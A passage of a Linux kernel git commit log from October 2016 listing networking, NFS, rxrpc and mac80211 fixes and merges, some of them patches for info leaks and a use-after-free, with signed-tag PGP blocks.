 qfup5aE6ky3LhuRD8GS00yWb96b43FGuPqt27LTH7SGnALX7KbETbBcgasyWqFeV
 UvPbVlk5R+0OXLxqOHvn20gRFS2c6HIdVAW6h7QHB0qwnLS1JJJToAczhK4QTsHQ
 eOXSGK4Gj0CiTd23bL7egaULKnD7eiZbagoty1UL05k8TAgPRnXXaMCRc0cupvKo
 5Amk7xT7ZN1Iyh9TQSt2MRIBIG6AOJogsmjSqgKJZY4YdCD5rYAWyAzc7K2l/L0e
 oUwDaPFWwNAfVYxJIXSd223squyxaXen0B+NlY501tqw4Ce4NnuEssqsSWk6OTHZ
 R9HCT200HvvZthPOStP7rdFiQ6VRDH3aSdl3zU4ila7cxr4wfdVslShuj91OiLqI
 /7zodCmls/8=
 =7krl
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20161013' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes

This set of patches contains a bunch of fixes:

 (1) Fix use of kunmap() after change from kunmap_atomic() within AFS.

 (2) Don't use of ERR_PTR() with an always zero value.

 (3) Check the right error when using ip6_route_output().

 (4) Be consistent about whether call->operation_ID is BE or CPU-E within
     AFS.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:44:45 -04:00
Shmulik Ladkani
53592b3640 net/sched: act_mirred: Implement ingress actions
Up until now, 'action mirred' supported only egress actions (either
TCA_EGRESS_REDIR or TCA_EGRESS_MIRROR).

This patch implements the corresponding ingress actions
TCA_INGRESS_REDIR and TCA_INGRESS_MIRROR.

This allows attaching filters whose target is to hand matching skbs into
the rx processing of a specified device.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:07 -04:00
Shmulik Ladkani
dcf800344a net/sched: act_mirred: Refactor detection whether dev needs xmit at mac header
Move detection logic that tests whether device expects skb data to point
at mac_header upon xmit into a function.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:06 -04:00
Shmulik Ladkani
165779231f net/sched: act_mirred: Rename tcfm_ok_push to tcfm_mac_header_xmit and make it a bool
'tcfm_ok_push' specifies whether a mac_len sized push is needed upon
egress to the target device (if action is performed at ingress).

Rename it to 'tcfm_mac_header_xmit' as this is actually an attribute of
the target device (and use a bool instead of int).

This allows to decouple the attribute from the action to be taken.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:23:06 -04:00
Nicolas Dichtel
a220445f9f ipv6: correctly add local routes when lo goes up
The goal of the patch is to fix this scenario:
 ip link add dummy1 type dummy
 ip link set dummy1 up
 ip link set lo down ; ip link set lo up

After that sequence, the local route to the link layer address of dummy1 is
not there anymore.

When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.

In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still sets to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.

Fixes: 25fb6ca4ed ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f62 ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b1 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:05:14 -04:00
stephen hemminger
cf53b1da73 Revert "net: Add driver helper functions to determine checksum offloadability"
This reverts commit 6ae23ad362.

The code has been in kernel since 4.4 but there are no in tree
code that uses. Unused code is broken code, remove it.

Signed-off-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:02:56 -04:00
Vadim Fedorenko
68d00f332e ip6_tunnel: fix ip6_tnl_lookup
The commit ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel
endpoints.") introduces support for wildcards in tunnels endpoints,
but in some rare circumstances ip6_tnl_lookup selects wrong tunnel
interface relying only on source or destination address of the packet
and not checking presence of wildcard in tunnels endpoints. Later in
ip6_tnl_rcv this packets can be dicarded because of difference in
ipproto even if fallback device have proper ipproto configuration.

This patch adds checks of wildcard endpoint in tunnel avoiding such
behavior

Fixes: ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel endpoints.")
Signed-off-by: Vadim Fedorenko <junk@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:01:26 -04:00
David S. Miller
8eed1cd4cd Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net 2016-10-14 10:00:27 -04:00
Linus Torvalds
29fbff8698 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:

 1) Fix various build warnings in tlan/qed/xen-netback drivers, from
    Arnd Bergmann.

 2) Propagate proper error code in strparser's strp_recv(), from Geert
    Uytterhoeven.

 3) Fix accidental broadcast of RTM_GETTFILTER responses, from Eric
    Dumazret.

 4) Need to use list_for_each_entry_safe() in qed driver, from Wei
    Yongjun.

 5) Openvswitch 802.1AD bug fixes from Jiri Benc.

 6) Cure BUILD_BUG_ON() in mlx5 driver, from Tom Herbert.

 7) Fix UDP ipv6 checksumming in netvsc driver, from Stephen Hemminger.

 8) stmmac driver fixes from Giuseppe CAVALLARO.

 9) Fix access to mangled IP6CB in tcp, from Eric Dumazet.

10) Fix info leaks in tipc and rtnetlink, from Dan Carpenter.

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (27 commits)
  net: bridge: add the multicast_flood flag attribute to brport_attrs
  net: axienet: Remove unused parameter from __axienet_device_reset
  liquidio: CN23XX: fix a loop timeout
  net: rtnl: info leak in rtnl_fill_vfinfo()
  tipc: info leak in __tipc_nl_add_udp_addr()
  net: ipv4: Do not drop to make_route if oif is l3mdev
  net: phy: Trigger state machine on state change and not polling.
  ipv6: tcp: restore IP6CB for pktoptions skbs
  netvsc: Remove mistaken udp.h inclusion.
  xen-netback: fix type mismatch warning
  stmmac: fix error check when init ptp
  stmmac: fix ptp init for gmac4
  qed: fix old-style function definition
  netvsc: fix checksum on UDP IPV6
  net_sched: reorder pernet ops and act ops registrations
  xen-netback: fix guest Rx stall detection (after guest Rx refactor)
  drivers/ptp: Fix kernel memory disclosure
  net/mlx5: Add MLX5_ARRAY_SET64 to fix BUILD_BUG_ON
  qmi_wwan: add support for Quectel EC21 and EC25
  openvswitch: add NETIF_F_HW_VLAN_STAG_TX to internal dev
  ...
2016-10-13 21:40:23 -07:00
Linus Torvalds
c4a86165d1 NFS client updates for Linux 4.9
Highlights include:
 
 Stable bugfixes:
 - sunrpc: fix writ espace race causing stalls
 - NFS: Fix inode corruption in nfs_prime_dcache()
 - NFSv4: Don't report revoked delegations as valid in
   nfs_have_delegation()
 - NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is
   invalid
 - NFSv4: Open state recovery must account for file permission changes
 - NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
 
 Features:
 - Add support for tracking multiple layout types with an ordered list
 - Add support for using multiple backchannel threads on the client
 - Add support for pNFS file layout session trunking
 - Delay xprtrdma use of DMA API (for device driver removal)
 - Add support for xprtrdma remote invalidation
 - Add support for larger xprtrdma inline thresholds
 - Use a scatter/gather list for sending xprtrdma RPC calls
 - Add support for the CB_NOTIFY_LOCK callback
 - Improve hashing sunrpc auth_creds by using both uid and gid
 
 Bugfixes:
 - Fix xprtrdma use of DMA API
 - Validate filenames before adding to the dcache
 - Fix corruption of xdr->nwords in xdr_copy_to_scratch
 - Fix setting buffer length in xdr_set_next_buffer()
 - Don't deadlock the state manager on the SEQUENCE status flags
 - Various delegation and stateid related fixes
 - Retry operations if an interrupted slot receives EREMOTEIO
 - Make nfs boot time y2038 safe
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCAAGBQJX/+ZfAAoJENfLVL+wpUDr5MUP/16s2Kp9ZZZZ7ICi3yrHOzb0
 9WpCOmbKUIELXl8YgkxlvPUYMzTQTIc32TwbVgdFV0g41my/0+O3z3+IiTrUGxH5
 8LgouMWBZ9KKmyUB//+KQAXr3j/bvDdF6Li6wJfz8a2o+9xT4oTkK1+Js8p0kn6e
 HNKfRknfCKwvE+j4tPCLfs2RX5qDyBFILXwWhj1fAbmT3rbnp+QqkXD4mWUrXb9z
 DBgxciXRhOkOQQAD2KQBFd2kUqWDZ5ED23b+aYsu9D3VCW45zitBqQFAxkQWL0hp
 x8Mp+MDCxlgdEaGQPUmUiDtPkG1X9ZxUJCAwaJWWsZaItwR2Il+en2sETctnTZ1X
 0IAxZVFdolzSeLzIfNx3OG32JdWJdaNjUzkIZam8gO6i1f6PAmK4alR0J3CT31nJ
 /OEN76o1E7acGWRMmj+MAZ2U5gPfR7EitOzyE8ZUPcHgyeGMiynjwi56WIpeSvT2
 F/Sp5kRe5+D5gtnYuppGp7Srp5vYdtFaz1zgPDUKpDLcxfDweO8AHGjJf3Zmrunx
 X24yia4A14CnfcUy4vKpISXRykmkG/3Z0tpWwV53uXZm4nlQfRc7gPibiW7Ay521
 af8sDoItW98K3DK5NQU7IUn83ua1TStzpoqlAEafRw//g9zPMTbhHvNvOyrRfrcX
 kjWn6hNblMu9M34JOjtu
 =XOrF
 -----END PGP SIGNATURE-----

Merge tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs

Pull NFS client updates from Anna Schumaker:
 "Highlights include:

  Stable bugfixes:
   - sunrpc: fix writ espace race causing stalls
   - NFS: Fix inode corruption in nfs_prime_dcache()
   - NFSv4: Don't report revoked delegations as valid in nfs_have_delegation()
   - NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is invalid
   - NFSv4: Open state recovery must account for file permission changes
   - NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic

  Features:
   - Add support for tracking multiple layout types with an ordered list
   - Add support for using multiple backchannel threads on the client
   - Add support for pNFS file layout session trunking
   - Delay xprtrdma use of DMA API (for device driver removal)
   - Add support for xprtrdma remote invalidation
   - Add support for larger xprtrdma inline thresholds
   - Use a scatter/gather list for sending xprtrdma RPC calls
   - Add support for the CB_NOTIFY_LOCK callback
   - Improve hashing sunrpc auth_creds by using both uid and gid

  Bugfixes:
   - Fix xprtrdma use of DMA API
   - Validate filenames before adding to the dcache
   - Fix corruption of xdr->nwords in xdr_copy_to_scratch
   - Fix setting buffer length in xdr_set_next_buffer()
   - Don't deadlock the state manager on the SEQUENCE status flags
   - Various delegation and stateid related fixes
   - Retry operations if an interrupted slot receives EREMOTEIO
   - Make nfs boot time y2038 safe"

* tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs: (100 commits)
  NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
  fs: nfs: Make nfs boot time y2038 safe
  sunrpc: replace generic auth_cred hash with auth-specific function
  sunrpc: add RPCSEC_GSS hash_cred() function
  sunrpc: add auth_unix hash_cred() function
  sunrpc: add generic_auth hash_cred() function
  sunrpc: add hash_cred() function to rpc_authops struct
  Retry operation on EREMOTEIO on an interrupted slot
  pNFS: Fix atime updates on pNFS clients
  sunrpc: queue work on system_power_efficient_wq
  NFSv4.1: Even if the stateid is OK, we may need to recover the open modes
  NFSv4: If recovery failed for a specific open stateid, then don't retry
  NFSv4: Fix retry issues with nfs41_test/free_stateid
  NFSv4: Open state recovery must account for file permission changes
  NFSv4: Mark the lock and open stateids as invalid after freeing them
  NFSv4: Don't test open_stateid unless it is set
  NFSv4: nfs4_do_handle_exception() handle revoke/expiry of a single stateid
  NFS: Always call nfs_inode_find_state_and_recover() when revoking a delegation
  NFSv4: Fix a race when updating an open_stateid
  NFSv4: Fix a race in nfs_inode_reclaim_delegation()
  ...
2016-10-13 21:28:20 -07:00
Linus Torvalds
2778556474 Some RDMA work and some good bugfixes, and two new features that could
benefit from user testing:
 
 Anna Schumacker contributed a simple NFSv4.2 COPY implementation.  COPY
 is already supported on the client side, so a call to copy_file_range()
 on a recent client should now result in a server-side copy that doesn't
 require all the data to make a round trip to the client and back.
 
 Jeff Layton implemented callbacks to notify clients when contended locks
 become available, which should reduce latency on workloads with
 contended locks.
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX/mcsAAoJECebzXlCjuG+MU0P/3SzTLGYXU5yOTAorx255/uf
 fUVKQQhTzzaA2xj3gWWWztYx3y0ZJUVgwU56a+Ap5Z8/goqDQ78H+ePEc+MG7BT/
 /UXS/bITvt0MP/dvPrDzhSltvqx/wpelLPBo29hGLlAQ2dsnD4Y75IbOOQccWqcC
 iD2v6x7lnpWZ7j9Zhwzg/JNQHwISIb7tiLoYBjfcdNDEMU76KIyhxD0Cx9MSeBzH
 9Rq/oEdwGDFS5WqVfNe2jxbngoauq1IupziQ2eQGv2D/POyXCx8fphoYjDz1XaW8
 PxaJtJtM2owPGG+z2CxklJqNaS1Z4F+oppjg+nf4i/ibxmIBaTy8NluASX3vMh69
 CDO1+ly+TiF0l1VqMOQJWRnqn1qGk6fLpF6P1Ac62B0oWpeLGU7nmik7XN1ORgsi
 8ksxRKNAWeprZo3wl5xNrADu/wlZ7XCJTc4QoHEgYT04aHF+j8EMCHv+mtZ8+Bwn
 WWiA8iItZOgXV4vitCRJlvsixjYvmF3djPIoI2Lt5KDWIg+eL89sKwzTALSfeC4m
 Vjb0svzPX1MmZCNP1rCStFbl3gZYXZyqPk+uA6M7H8mjAjVeKxRPowWpMBgvYZHr
 FjCPb878bAuqCeBVbIyOLLcKWBLTw8PsUWZAor3gNg454JGkMjLUyJ/S22Cz5Nbo
 HdjoiTJtbPrHnCwTMXwa
 =nozl
 -----END PGP SIGNATURE-----

Merge tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux

Pull nfsd updates from Bruce Fields:
 "Some RDMA work and some good bugfixes, and two new features that could
  benefit from user testing:

   - Anna Schumacker contributed a simple NFSv4.2 COPY implementation.
     COPY is already supported on the client side, so a call to
     copy_file_range() on a recent client should now result in a
     server-side copy that doesn't require all the data to make a round
     trip to the client and back.

   - Jeff Layton implemented callbacks to notify clients when contended
     locks become available, which should reduce latency on workloads
     with contended locks"

* tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux:
  NFSD: Implement the COPY call
  nfsd: handle EUCLEAN
  nfsd: only WARN once on unmapped errors
  exportfs: be careful to only return expected errors.
  nfsd4: setclientid_confirm with unmatched verifier should fail
  nfsd: randomize SETCLIENTID reply to help distinguish servers
  nfsd: set the MAY_NOTIFY_LOCK flag in OPEN replies
  nfs: add a new NFS4_OPEN_RESULT_MAY_NOTIFY_LOCK constant
  nfsd: add a LRU list for blocked locks
  nfsd: have nfsd4_lock use blocking locks for v4.1+ locks
  nfsd: plumb in a CB_NOTIFY_LOCK operation
  NFSD: fix corruption in notifier registration
  svcrdma: support Remote Invalidation
  svcrdma: Server-side support for rpcrdma_connect_private
  rpcrdma: RDMA/CM private message data structure
  svcrdma: Skip put_page() when send_reply() fails
  svcrdma: Tail iovec leaves an orphaned DMA mapping
  nfsd: fix dprintk in nfsd4_encode_getdeviceinfo
  nfsd: eliminate cb_minorversion field
  nfsd: don't set a FL_LAYOUT lease for flexfiles layouts
2016-10-13 21:04:42 -07:00
Nikolay Aleksandrov
4eb6753c33 net: bridge: add the multicast_flood flag attribute to brport_attrs
When I added the multicast flood control flag, I also added an attribute
for it for sysfs similar to other flags, but I forgot to add it to
brport_attrs.

Fixes: b6cb5ac833 ("net: bridge: add per-port multicast flood flag")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:16:36 -04:00
Dan Carpenter
775f4f0550 net: rtnl: info leak in rtnl_fill_vfinfo()
The "vf_vlan_info" struct ends with a 2 byte struct hole so we have to
memset it to ensure that no stack information is revealed to user space.

Fixes: 79aab093a0 ('net: Update API for VF vlan protocol 802.1ad support')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:12:04 -04:00
Dan Carpenter
7307616245 tipc: info leak in __tipc_nl_add_udp_addr()
We should clear out the padding and unused struct members so that we
don't expose stack information to userspace.

Fixes: fdb3accc2c ('tipc: add the ability to get UDP options via netlink')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:10:01 -04:00
David Ahern
6104e112f4 net: ipv4: Do not drop to make_route if oif is l3mdev
Commit e0d56fdd73 was a bit aggressive removing l3mdev calls in
the IPv4 stack. If the fib_lookup fails we do not want to drop to
make_route if the oif is an l3mdev device.

Also reverts 19664c6a00 ("net: l3mdev: Remove netif_index_is_l3_master")
which removed netif_index_is_l3_master.

Fixes: e0d56fdd73 ("net: l3mdev: remove redundant calls")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:05:26 -04:00
Eric Dumazet
8ce48623f0 ipv6: tcp: restore IP6CB for pktoptions skbs
Baozeng Ding reported following KASAN splat :

BUG: KASAN: use-after-free in ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 at addr ffff880029c84ec8
Read of size 1 by task poc/25548
Call Trace:
 [<ffffffff82cf43c9>] dump_stack+0x12e/0x185 /lib/dump_stack.c:15
 [<     inline     >] print_address_description /mm/kasan/report.c:204
 [<ffffffff817ced3b>] kasan_report_error+0x48b/0x4b0 /mm/kasan/report.c:283
 [<     inline     >] kasan_report /mm/kasan/report.c:303
 [<ffffffff817ced9e>] __asan_report_load1_noabort+0x3e/0x40 /mm/kasan/report.c:321
 [<ffffffff85c71da1>] ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 /net/ipv6/datagram.c:687
 [<ffffffff85c734c3>] ip6_datagram_recv_ctl+0x33/0x40
 [<ffffffff85c0b07c>] do_ipv6_getsockopt.isra.4+0xaec/0x2150
 [<ffffffff85c0c7f6>] ipv6_getsockopt+0x116/0x230
 [<ffffffff859b5a12>] tcp_getsockopt+0x82/0xd0 /net/ipv4/tcp.c:3035
 [<ffffffff855fb385>] sock_common_getsockopt+0x95/0xd0 /net/core/sock.c:2647
 [<     inline     >] SYSC_getsockopt /net/socket.c:1776
 [<ffffffff855f8ba2>] SyS_getsockopt+0x142/0x230 /net/socket.c:1758
 [<ffffffff8685cdc5>] entry_SYSCALL_64_fastpath+0x23/0xc6
Memory state around the buggy address:
 ffff880029c84d80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 ffff880029c84e00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
> ffff880029c84e80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              ^
 ffff880029c84f00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 ffff880029c84f80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

He also provided a syzkaller reproducer.

Issue is that ip6_datagram_recv_specific_ctl() expects to find IP6CB
data that was moved at a different place in tcp_v6_rcv()

This patch moves tcp_v6_restore_cb() up and calls it from
tcp_v6_do_rcv() when np->pktoptions is set.

Fixes: 971f10eca1 ("tcp: better TCP_SKB_CB layout to reduce cache line misses")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 11:07:34 -04:00
Roopa Prabhu
de1dfeefef bridge: add address and vlan to fdb warning messages
This patch adds vlan and address to warning messages printed
in the bridge fdb code for debuggability.

Signed-off-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:49:54 -04:00
WANG Cong
ab102b80ce net_sched: reorder pernet ops and act ops registrations
Krister reported a kernel NULL pointer dereference after
tcf_action_init_1() invokes a_o->init(), it is a race condition
where one thread calling tcf_register_action() to initialize
the netns data after putting act ops in the global list and
the other thread searching the list and then calling
a_o->init(net, ...).

Fix this by moving the pernet ops registration before making
the action ops visible. This is fine because: a) we don't
rely on act_base in pernet ops->init(), b) in the worst case we
have a fully initialized netns but ops is still not ready so
new actions still can't be created.

Reported-by: Krister Johansen <kjlx@templeofstupid.com>
Tested-by: Krister Johansen <kjlx@templeofstupid.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:26:43 -04:00
Jiri Benc
3145c037e7 openvswitch: add NETIF_F_HW_VLAN_STAG_TX to internal dev
The internal device does support 802.1AD offloading since 018c1dda5f
("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink
attributes").

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Jiri Benc
72ec108d70 openvswitch: fix vlan subtraction from packet length
When the packet has its vlan tag in skb->vlan_tci, the length of the VLAN
header is not counted in skb->len. It doesn't make sense to subtract it.

Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Jiri Benc
20ecf1e4e3 openvswitch: vlan: remove wrong likely statement
This code is called whenever flow key is being extracted from the packet.
The packet may be as likely vlan tagged as not.

Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Eric Dumazet
fa59b27c9d net_sched: do not broadcast RTM_GETTFILTER result
There are two ways to get tc filters from kernel to user space.

1) Full dump (tc_dump_tfilter())
2) RTM_GETTFILTER to get one precise filter, reducing overhead.

The second operation is unfortunately broadcasting its result,
polluting "tc monitor" users.

This patch makes sure only the requester gets the result, using
netlink_unicast() instead of rtnetlink_send()

Jamal cooked an iproute2 patch to implement "tc filter get" operation,
but other user space libraries already use RTM_GETTFILTER when a single
filter is queried, instead of dumping all filters.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:51:55 -04:00
Xin Long
8ae808eb85 sctp: remove the old ttl expires policy
The prsctp polices include ttl expires policy already, we should remove
the old ttl expires codes, and just adjust the new polices' codes to be
compatible with the old one for users.

This patch is to remove all the old expires codes, and if prsctp polices
are not set, it will still set msg's expires_at and check the expires in
sctp_check_abandoned.

Note that asoc->prsctp_enable is set by default, so users can't feel any
difference even if they use the old expires api in userspace.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:44:14 -04:00
Xin Long
cc6ac9bccf sctp: reuse sent_count to avoid retransmitted chunks for RTT measurements
Now sctp uses chunk->resent to record if a chunk is retransmitted, for
RTT measurements with retransmitted DATA chunks. chunk->sent_count was
introduced to record how many times one chunk has been sent for prsctp
RTX policy before. We actually can know if one chunk is retransmitted
by checking chunk->sent_count is greater than 1.

This patch is to remove resent from sctp_chunk and reuse sent_count
to avoid retransmitted chunks for RTT measurements.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:44:13 -04:00
Jarod Wilson
a52ad514fd net: deprecate eth_change_mtu, remove usage
With centralized MTU checking, there's nothing productive done by
eth_change_mtu that isn't already done in dev_set_mtu, so mark it as
deprecated and remove all usage of it in the kernel. All callers have been
audited for calls to alloc_etherdev* or ether_setup directly, which means
they all have a valid dev->min_mtu and dev->max_mtu. Now eth_change_mtu
prints out a netdev_warn about being deprecated, for the benefit of
out-of-tree drivers that might be utilizing it.

Of note, dvb_net.c actually had dev->mtu = 4096, while using
eth_change_mtu, meaning that if you ever tried changing it's mtu, you
couldn't set it above 1500 anymore. It's now getting dev->max_mtu also set
to 4096 to remedy that.

v2: fix up lantiq_etop, missed breakage due to drive not compiling on x86

CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:36:57 -04:00
Jarod Wilson
61e84623ac net: centralize net_device min/max MTU checking
While looking into an MTU issue with sfc, I started noticing that almost
every NIC driver with an ndo_change_mtu function implemented almost
exactly the same range checks, and in many cases, that was the only
practical thing their ndo_change_mtu function was doing. Quite a few
drivers have either 68, 64, 60 or 46 as their minimum MTU value checked,
and then various sizes from 1500 to 65535 for their maximum MTU value. We
can remove a whole lot of redundant code here if we simple store min_mtu
and max_mtu in net_device, and check against those in net/core/dev.c's
dev_set_mtu().

In theory, there should be zero functional change with this patch, it just
puts the infrastructure in place. Subsequent patches will attempt to start
using said infrastructure, with theoretically zero change in
functionality.

CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:36:56 -04:00
Purushottam Kushwaha
0c317a02ca cfg80211: support virtual interfaces with different beacon intervals
This commit provides a mechanism for the host drivers to advertise the
support for different beacon intervals among the respective interface
combinations in a group, through NL80211_IFACE_COMB_BI_MIN_GCD (u32).

This value will be compared against GCD of all beaconing interfaces of
matching combinations.

If the driver doesn't advertise this value, the old behaviour where
all beacon intervals must be identical is retained.

If it is specified, then any beacon interval for an interface in the
interface combination as well as the GCD of all active beacon intervals
in the combination must be greater or equal to this value.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
[change commit message, some variable names, small other things]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-13 14:28:29 +02:00
Purushottam Kushwaha
e227300c83 cfg80211: pass struct to interface combination check/iter
Move the growing parameter list to a structure for the interface
combination check and iteration functions in cfg80211 and mac80211
to make the code easier to understand.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
[edit commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-13 13:39:49 +02:00
David Howells
07096f612f rxrpc: Fix checking of error from ip6_route_output()
ip6_route_output() doesn't return a negative error when it fails, rather
the ->error field of the returned dst_entry struct needs to be checked.

Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 75b54cb57c ("rxrpc: Add IPv6 support")
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-13 08:43:17 +01:00
David Howells
54fde42345 rxrpc: Fix checker warning by not passing always-zero value to ERR_PTR()
Fix the following checker warning:

	net/rxrpc/call_object.c:279 rxrpc_new_client_call()
	warn: passing zero to 'ERR_PTR'

where a value that's always zero is passed to ERR_PTR() so that it can be
passed to a tracepoint in an auxiliary pointer field.

Just pass NULL instead to the tracepoint.

Fixes: a84a46d730 ("rxrpc: Add some additional call tracing")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-13 08:39:52 +01:00
Johannes Berg
32910bb951 mac80211: preserve more bits when building QoS header
Michael Braun reported that when trying to inject A-MSDUs over
monitor interfaces, the frame doesn't come out right since the
QoS header A-MSDU bit is overwritten.

Rather than adding that bit specifically simply preserve those
bits that we don't set here, since we typically get here with
a zeroed-out QoS header anyway.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 14:17:13 +02:00
Michael Braun
72f15d53f3 mac80211: filter multicast data packets on AP / AP_VLAN
This patch adds filtering for multicast data packets on AP_VLAN
interfaces that have no authorized station connected and changes
filtering on AP interfaces to not count stations assigned to
AP_VLAN interfaces.

This saves airtime and avoids waking up other stations currently
authorized in this BSS. When using WPA, the packets dropped could
not be decrypted by any station.

The behaviour when there are no AP_VLAN interfaces is left unchanged.

When there are AP_VLAN interfaces, this patch
1. adds filtering multicast data packets sent on AP_VLAN interfaces
